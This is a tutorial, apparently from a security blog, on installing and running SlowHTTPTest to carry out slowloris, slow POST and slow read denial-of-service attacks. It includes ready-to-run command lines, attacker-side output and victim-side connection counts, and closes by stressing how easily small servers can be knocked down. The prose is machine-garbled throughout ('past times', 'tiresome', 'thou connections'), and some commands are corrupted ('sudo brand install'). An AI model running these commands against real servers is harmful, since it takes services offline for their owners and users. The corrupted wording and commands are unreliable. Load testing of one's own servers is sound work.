SlowHTTPTest is a highly configurable tool that simulates to a greater extent than or less Application Layer Denial of Service attacks. It plant on bulk of Linux platforms, OSX together with Cygwin – a Unix-like surround together with command-line interface for Microsoft Windows.
It implements virtually mutual low-bandwidth Application Layer DoS attacks, such equally slowloris, Slow HTTP POST, Slow Read attack (based on TCP persist timer exploit) past times draining concurrent connections pool, equally good equally Apache Range Header attack past times causing really pregnant retention together with CPU usage on the server.
Slowloris together with Slow HTTP POST DoS attacks rely on the fact that the HTTP protocol, past times design, requires requests to endure completely received past times the server earlier they are processed. If an HTTP asking is non complete, or if the transfer charge per unit of measurement is really low, the server keeps its resources busy waiting for the residuum of the data. If the server keeps besides many resources busy, this creates a denial of service. This tool is sending partial HTTP requests, trying to larn denial of service from target HTTP server.
Slow Read DoS attack aims the same resources equally slowloris together with tiresome POST, but instead of prolonging the request, it sends legitimate HTTP asking together with reads the answer slowly.
Installation
Installation for Kali Linux users
For Kali Linux users, install via apt-get .. (life is good!)
root@kali: # apt-get install slowhttptest
Reading bundle lists... Done
Building dependency tree
Reading state information... Done
The next NEW packages volition endure installed:
slowhttptest
0 upgraded, 1 newly installed, 0 to take together with 25 non upgraded.
Need to larn 29.6 kB of archives.
After this operation, 98.3 kB of additional disk infinite volition endure used.
Get:1 http://http.kali.org/kali/ kali/main slowhttptest amd64 1.6-1kali1 [29.6 kB]
Fetched 29.6 kB inwards 1s (21.8 kB/s)
Selecting previously unselected bundle slowhttptest.
(Reading database ... 376593 files together with directories currently installed.)
Unpacking slowhttptest (from .../slowhttptest_1.6-1kali1_amd64.deb) ...
Processing triggers for man-db ...
Setting upwards slowhttptest (1.6-1kali1) ...
root@kali: #
For other Linux distributions
The tool is distributed equally portable package, therefore simply download the latest tarball from Downloads section, extract, configure, compile, together with install:
$ tar -xzvf slowhttptest-x.x.tar.gz
$ cd slowhttptest-x.x
$ ./configure --prefix=PREFIX
$ make
$ sudo brand install
Where PREFIX must endure replaced alongside the absolute path where slowhttptest tool should endure installed.
You require libssl-dev to endure installed to successfully compile the tool. Most systems would stimulate got it.
Alternatively
Mac OS X
Using Homebrew:
brew update && brew install slowhttptest
Linux
Try your favorite bundle manager, to a greater extent than or less of them are aware of slowhttptest (Like Kali Linux).
Usage
slowhttptest is a dandy tool equally it allows yous to exercise many things. Following are few usages
Example of usage inwards tiresome message trunk mode
slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3
Same exam alongside graph
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3
Example of usage inwards slowloris mode
slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3
Same exam alongside graph
slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3
Example of usage inwards tiresome read manner alongside probing through proxy
Here x.x.x.x:8080 proxy used to stimulate got website availability from IP unlike than yours:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver/somebigresource -p five -l 350 -e x.x.x.x:8080
Output
Depends on verbosity level, output tin endure either equally elementary equally heartbeat message generated every five seconds showing condition of connections alongside verbosity bird 1, or amount traffic dump alongside verbosity bird 4.
-g selection would generate both CSV file together with interactive HTML based on Google Chart Tools.
Here is a sample screenshot of generated HTML page
that contains graphically represented connections states together with server availability intervals, together with gives the flick on how detail server behaves nether specific charge inside given fourth dimension frame.
CSV file tin endure used equally information source for your favorite nautical chart edifice tool, similar MS Excel, iWork Numbers, or Google Docs.
Last message you’ll meet is the larn out condition that hints for possible possible programme termination reasons:
| “Hit exam fourth dimension limit” | program reached the fourth dimension boundary specified alongside -l argument |
| “No opened upwards connections left” | peer unopen all connections |
| “Cannot institute connection” | no connections were established during outset due north seconds of the test, where due north is either value of -i argument, or 10, if non specified. This would locomote on if at that topographic point is no road to host or remote peer is down |
| “Connection refused” | remote peer doesn’t stimulate got connections (from yous only? Use proxy to probe) on specified port |
| “Cancelled past times user” | you pressed Ctrl-C or sent SIGINT inwards another way |
| “Unexpected error” | should never happen |
Sample output for a existent test
I’ve done this exam inwards a sample server together with this is what I’ve seen from both attacking together with victim end.
From attackers end
So, I am collection stats together with attacking www.localhost.com alongside thou connections.
root@kali: # slowhttptest -c thou -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.localhost.com -x 10 -p 3
Tue Sep 23 11:22:57 2014:
slowhttptest version 1.6
- https://code.google.com/p/slowhttptest/ -
test type: SLOW BODY
number of connections: 1000
URL: http://www.localhost.com/
verb: FAKEVERB
Content-Length header value: 8192
follow upwards information max size: 22
interval betwixt follow upwards data: 110 seconds
connections per seconds: 200
probe connectedness timeout: three seconds
test duration: 240 seconds
using proxy: no proxy
Tue Sep 23 11:22:57 2014:
slow HTTP exam condition on 85th second:
initializing: 0
pending: 23
connected: 133
error: 0
closed: 844
service available: YES
^CTue Sep 23 11:22:58 2014:
Test ended on 86th second
Exit status: Cancelled past times user
CSV study saved to my_body_stats.csv
HTML study saved to my_body_stats.html
From victim server end:
rootuser@localhost [/home]# pgrep httpd | wc -l
151
Total release of httpd connections jumped to 151 inside 85 seconds. (I’ve got a fast Internet!)
And of course of teaching I desire to meet how what’s inwards my /var/log/messages
rootuser@someserver [/var/log]# tail -100 message | grep Firewall
Sep 23 11:43:39 someserver: IP 1.2.3.4 (XX/Anonymous/1-2-3-4) found to stimulate got 504 connections
As yous tin meet I managed to crank upwards 504 connections from a unmarried IP inwards less than 85 seconds … This is to a greater extent than than plenty to choose downward a server (well virtually pocket-sized servers together with VPS’s for sure).
Further reading together with references
- Slowhttptest inwards Google
- How I knocked downward thirty servers using slowhttptest
- Slow Read DoS laid on explained
- Test results of pop HTTP servers
- How to protect against tiresome HTTP DoS attacks
Conclusion:
To come inwards worse, yous tin exercise it from Windows, Linux together with fifty-fifty a Mac. If yous tin run multiple DoS tools such equally GoldenEye , hping3 on a unmarried spider web server, together with then it is really piece of cake to knock it down. There are strategies to defend against such attacks (see #5 on Further reading together with references list), but for a pocket-sized server where resources is express together with run past times non information technology people (bloggers etc.) it apace becomes a nightmare. Thanks for reading, delight portion together with RT.
